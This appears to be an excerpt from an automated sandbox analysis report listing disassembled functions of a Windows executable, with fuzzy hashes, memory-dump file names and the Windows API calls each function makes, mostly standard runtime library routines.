Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027a524d8335f16cd83d39c7c577341527161735b7cde08d2f5bba66f9dd171a
Instruction ID: dcf5173fb5a3d6fc58f63c454ad310ca39e873b63faafb883667dc377afd3e50
Opcode Fuzzy Hash: 027a524d8335f16cd83d39c7c577341527161735b7cde08d2f5bba66f9dd171a
Instruction Fuzzy Hash: 12E06D31604304EFCB05CF6AC554A49B3E9EB46345F2444A4E509C7760E735DE44CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00904698 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6149605691f7e1e7f884f65d14523c053f7634a947f99675df77e5bd925aa7da
Instruction ID: 268038f00e33c93368ee4b30227c219308ae98fc99099ae39bddeed7c715d308
Opcode Fuzzy Hash: 6149605691f7e1e7f884f65d14523c053f7634a947f99675df77e5bd925aa7da
Instruction Fuzzy Hash: 78E08271500208EFCB00CFA8C049B4AB7F8FB48348F1048A8E408C3250D234EF80CA40

Uniqueness

Uniqueness Score: -1.00%

Function 0085EFC0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dabf8f3a98e26ea0ce754ad8f3e41c3d698f6a48865104e3207fa9f3cd7cf31d
Instruction ID: f4333f14d20158febdb2c681920ab254ec3568541ac2311f7b92d9395e9464d6
Opcode Fuzzy Hash: dabf8f3a98e26ea0ce754ad8f3e41c3d698f6a48865104e3207fa9f3cd7cf31d
Instruction Fuzzy Hash: 43D0927A645A58AFC211CF8AE840D41F7B9FB8D671B1581A6EA0893B20C371FC11CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 0085E9E0 Relevance: 19.6, APIs: 13, Instructions: 146COMMON

Download Yara Rule

APIs

SetServiceStatus.ADVAPI32 ref: 0085EA10
SetServiceStatus.ADVAPI32 ref: 0085EA3A
SetServiceStatus.ADVAPI32 ref: 0085EA67
SetServiceStatus.ADVAPI32 ref: 0085EA94
SetServiceStatus.ADVAPI32 ref: 0085EAC1
SetServiceStatus.ADVAPI32 ref: 0085EAEE
SetServiceStatus.ADVAPI32 ref: 0085EB18
SetServiceStatus.ADVAPI32 ref: 0085EB45
SetServiceStatus.ADVAPI32 ref: 0085EB72
SetServiceStatus.ADVAPI32 ref: 0085EB9C
SetServiceStatus.ADVAPI32 ref: 0085EBC6
SetServiceStatus.ADVAPI32 ref: 0085EBF3
SetServiceStatus.ADVAPI32 ref: 0085EC20

Memory Dump Source

Source File: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: 0a7ec2365cd6e33aa788d21cfa6c3757677f93ca94de57ee686dd7df8cafb4c6
Instruction ID: 1b3dec7b87c270a476a1afa41601152172857bec332366527d4848184e9600a0
Opcode Fuzzy Hash: 0a7ec2365cd6e33aa788d21cfa6c3757677f93ca94de57ee686dd7df8cafb4c6
Instruction Fuzzy Hash: 0861F73451D2449FD741EF68C694B6D7FF1AF46302F0584ACE8C48B3A6CA789A18EB52

Uniqueness

Uniqueness Score: -1.00%

Function 008AA9E1 Relevance: 9.2, APIs: 6, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 008AAA6C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 008AAAFA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008AAB6C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 008AAB86
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008AABE9
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 008AAC06

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: 6195e845e5224f659cc5579eac5a85871f03706b0664daa6609ea4c4c0eecc4c
Instruction ID: ffa018beca0f9c2cb1af55c768140588c17dfd2de9ebd90b3a8e3625f93f645f
Opcode Fuzzy Hash: 6195e845e5224f659cc5579eac5a85871f03706b0664daa6609ea4c4c0eecc4c
Instruction Fuzzy Hash: C371D23290021AAFFF259F64CD45AEE7BF6FF4A364F180019E805E6950EB319D04DB62

Uniqueness

Uniqueness Score: -1.00%

Function 008897FF Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00889848
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 008898B3
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008898D0
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0088990F
LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0088996E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00889991

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: b07c8c40722aa8c390c76d8134c17a488e199a334ac67af1ef23c473a1ce4213
Instruction ID: 7ae535201ed9b5a2fdb106a4d62be37d90b3cbc330b75f332a35e8c544ea77ef
Opcode Fuzzy Hash: b07c8c40722aa8c390c76d8134c17a488e199a334ac67af1ef23c473a1ce4213
Instruction Fuzzy Hash: 3851AB7261021AABEB20AFA4CC45FBA7FA9FF40750F184429FD54E6190DB318D10DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008834B1 Relevance: 9.2, APIs: 6, Instructions: 153threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 008834D9
GetCurrentThreadId.KERNEL32 ref: 008834F6
GetCurrentThreadId.KERNEL32 ref: 00883517
GetCurrentThreadId.KERNEL32 ref: 0088359A
GetCurrentThreadId.KERNEL32 ref: 008835DE
GetCurrentThreadId.KERNEL32 ref: 00883624

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: c1d23c1fc4d3e6301d92e211529f9312d6e982b77154f6e2a33874633446f6be
Instruction ID: baaa65582d81e64c3fdfe9e0d334b4b52ae72611ef81961c724d96f2a4c153fa
Opcode Fuzzy Hash: c1d23c1fc4d3e6301d92e211529f9312d6e982b77154f6e2a33874633446f6be
Instruction Fuzzy Hash: AA51B071900215DFCF20EF28D985AA9B7F1FF18B10B254069E806EB291EB30EE41DF95

Uniqueness

Uniqueness Score: -1.00%

Function 008CD178 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,27D23252,?,?,00000000,00927A82,000000FF,?,008CD0DB,?,?,008CD08A,?), ref: 008CD1AD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008CD1BF
FreeLibrary.KERNEL32(00000000,?,?,00000000,00927A82,000000FF,?,008CD0DB,?,?,008CD08A,?), ref: 008CD1E1

Strings

CorExitProcess, xrefs: 008CD1B7
mscoree.dll, xrefs: 008CD1A6

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e3222a67de1c56db10ec12e3a99e02f7864ea93ca2c25deffeb22a6e54885357
Instruction ID: 2b908ad6b38e7e86b4984f80beab456f704c036d5fb9255087423de0d7a66eb2
Opcode Fuzzy Hash: e3222a67de1c56db10ec12e3a99e02f7864ea93ca2c25deffeb22a6e54885357
Instruction Fuzzy Hash: 3E014F36A58615EFDB119B94DC05FBEBBB8FB44B15F04462AE811E26E0DB749900CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00900845 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,009007E1), ref: 00900854
GetLastError.KERNEL32(?,009007E1), ref: 0090085E
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0090089C

Strings

ext-ms-, xrefs: 00900881
api-ms-, xrefs: 0090086B

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 6d9b1c3dbf19ca50111cce517f7a2b81e8244a4fee3d9a371cc5677da080fd77
Instruction ID: 5cb23a969b6e3c820a1b9ae3ff7e0f88119fdd60933b52f4900201af05c4605a
Opcode Fuzzy Hash: 6d9b1c3dbf19ca50111cce517f7a2b81e8244a4fee3d9a371cc5677da080fd77
Instruction Fuzzy Hash: DDF08C31694204FFEF201B20DC06B293A19BF80B54F588030FE4CA95E1FBB2D820D985

Uniqueness

Uniqueness Score: -1.00%

Function 008ACA70 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 008ACAA7
_ValidateLocalCookies.LIBCMT ref: 008ACB38
_ValidateLocalCookies.LIBCMT ref: 008ACBB8

Strings

csm, xrefs: 008ACB4D

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate
String ID: csm
API String ID: 2268201637-1018135373
Opcode ID: 8991ed60c1f36a22d8e7927f2357955d19e80c2bfa2a270324d1141ac8540488
Instruction ID: a12d3855cfc2e3ac809d7b311bd244ce2dd447ae19a7524089506d988cbe11c4
Opcode Fuzzy Hash: 8991ed60c1f36a22d8e7927f2357955d19e80c2bfa2a270324d1141ac8540488
Instruction Fuzzy Hash: 6B41B234A002189BDF00DF6CC881AAEBFA5FF46324F148155EC15EB752D732AA16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008BAF02 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,008BAD14), ref: 008BAF0F
GetLastError.KERNEL32(?,008BAD14), ref: 008BAF19
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 008BAF41

Strings

api-ms-, xrefs: 008BAF26

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: d48c406fe81948e0f59ac97b2337f68a7fc527fd7fdfe52edc69f54633f8b019
Instruction ID: 5287c3a1587a62302998dccb06c1fe052e9ed725b7f81e6f9f56d57d3afe289a
Opcode Fuzzy Hash: d48c406fe81948e0f59ac97b2337f68a7fc527fd7fdfe52edc69f54633f8b019
Instruction Fuzzy Hash: DEE01A71398206FBEB101B60EC46BB83A55FF10B41F544070FA0CE82E1EF61E910D986

Uniqueness

Uniqueness Score: -1.00%

